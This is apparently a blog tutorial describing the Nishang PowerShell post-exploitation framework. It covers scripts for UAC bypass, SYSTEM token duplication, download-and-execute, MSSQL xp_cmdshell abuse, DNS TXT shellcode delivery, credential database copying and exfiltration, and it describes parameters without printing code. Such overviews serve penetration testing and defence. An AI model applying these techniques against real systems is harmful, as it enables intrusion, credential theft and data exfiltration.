nishang 1

Mastering Windows Post-Exploitation with Nishang: A Comprehensive Guide

Introduction to Nishang

Nishang is a powerful post-exploitation framework developed by Nikhil Mittal. It comprises a collection of PowerShell scripts that can be utilized during the post-exploitation phase of a penetration test. These scripts enable a variety of tasks, including port scanning, information gathering, privilege escalation, credential harvesting, and establishing backdoors. One of the key advantages of Nishang is that it does not require any installation on the target Windows system, as it leverages PowerShell, which is natively available. Additionally, the scripts are executed in memory, leaving minimal traces on the disk.

The Importance of Privilege Escalation

Privilege Escalation is a critical phase in the post-exploitation process. After gaining initial access to a system, an attacker often finds themselves with limited user privileges. To achieve their objectives, they need to escalate these privileges to gain higher access levels. Nishang provides three scripts specifically designed for privilege escalation, which are detailed below.

Enable-DuplicateToken

In Windows systems, administrative accounts possess high privileges that allow them to perform various administrative tasks. However, even these accounts can sometimes face access restrictions. For instance, administrative accounts do not have access to the “HKLM:SECURITY” registry key. To access this key, SYSTEM privileges are required. The Enable-DuplicateToken script duplicates the Access Token used by the “lsass.exe” process, which runs with SYSTEM privileges. This token can then be used by the script executor to perform tasks with SYSTEM privileges. It is important to note that the account running this script must already have administrative privileges.

Invoke-PsUACMe

This script bypasses User Account Control (UAC) using methods found in the UACME repository. The techniques employed involve DLL hijacking and manipulating executable file names and locations. The Invoke-PsUACMe script utilizes these methods to bypass UAC. The script accepts several parameters, including:

  • Payload: Specifies the PowerShell command to be executed on the process with elevated privileges.
  • Method: Determines the method used for privilege escalation. The default method is “sysprep”.
  • Path: Specifies the path for the payload. The default path is “C:Windowstempcmd.bat”.
  • CustomDLL64: Specifies the path for a custom 64-bit DLL file.
  • CustomDLL32: Specifies the path for a custom 32-bit DLL file.

Remove-Update

This script removes all updates from the system. The “KBID” parameter specifies the ID of the update to be removed. This can be particularly useful in scenarios where specific updates interfere with the execution of certain exploits or payloads.

Executing Commands and Payloads

During the post-exploitation phase, there are often situations where an attacker needs to execute commands or payloads from a remote location. Nishang provides several methods for executing commands, which are detailed below.

Download-Execute-PS

This script downloads and executes a PowerShell script from a specified URL. The URL is specified using the “ScriptURL” parameter. The script can be executed with arguments specified using the “Arguments” parameter. If the script should not be saved on the target machine, the “Nodownload” parameter can be used.

Download_Execute

This script converts a text file containing an executable into a runnable application and executes it. The only parameter required is the “URL” parameter, which specifies the URL from which the file is downloaded and executed. The “exetotext.ps1” script in Nishang can be used to convert an executable into a text file.

Execute-Command-MSSQL

This script allows an attacker to execute commands on a remote MSSQL Server. By specifying the administrator username and password for the MSSQL Server service, the script enables the xp_cmdshell stored procedure, which can then be used to execute commands on the target machine. If Windows Authentication is used by MSSQL, the script can leverage this authentication method, and no username or password is required. The parameters for this script include:

  • ComputerName: The name or IP address of the machine running the MSSQL Server.
  • UserName: The administrator username for the MSSQL Server.
  • Password: The password for the administrator user.
  • WindowsAuthentication: This parameter is used to specify that SQL Server Windows Authentication should be used.

Execute-DNSTXT-Code

This script utilizes DNS TXT queries to execute shellcode on the target system. The script retrieves payload shellcode from DNS TXT records, decodes it from Base64, and executes it, thereby establishing a connection. The “Out-DnsTxt” script in Nishang can be used to place the shellcode in Base64 format into DNS TXT records. The script requires at least three parameters: “shellcode32”, “shellcode64”, and “AuthNS”. These parameters specify the domain names where the 32-bit and 64-bit shellcode in Base64 format are located, and an authoritative nameserver.

Out-RundllCommand

This script generates commands that can be executed by the rundll32.exe application. When these commands are executed on the target machine, a PowerShell session is established. The script requires two parameters: “IPAddress” and “Port”. The “IPAddress” parameter specifies the IP address of the attacker’s machine where the listener is started, and the “Port” parameter specifies the port on which the listener is running.

Gathering Information

After compromising a machine, an attacker needs to gather information to proceed with the post-exploitation phase. This information can include host details, credentials, and other sensitive data. Nishang provides several scripts for information gathering, which are detailed below.

Check-VM

This script checks if the machine is running in a virtual environment. It examines the registry keys and running services to detect the presence of virtualization software such as Hyper-V, VMWare, VirtualBox, Virtual PC, Xen, and QEMU.

Copy-VSS

This script creates copies of the SAM, NTDS.DIT databases, and the SYSTEM hive, which are used to store credentials in Windows systems. These files are locked while the operating system is running, so this script allows an attacker to create copies of these files for further analysis.

FireBuster

This script determines which port can be used to exfiltrate data from the network. It performs a port scan to find open ports and then sends all packets to a listener started by FireListener.

FireListener

FireListener starts a listener that can receive packets sent by FireBuster. This allows an attacker to exfiltrate data from the target network.

Get-Information

This script gathers information from the target machine. It retrieves data from the registry and executes various commands to extract sensitive information.

Similar Posts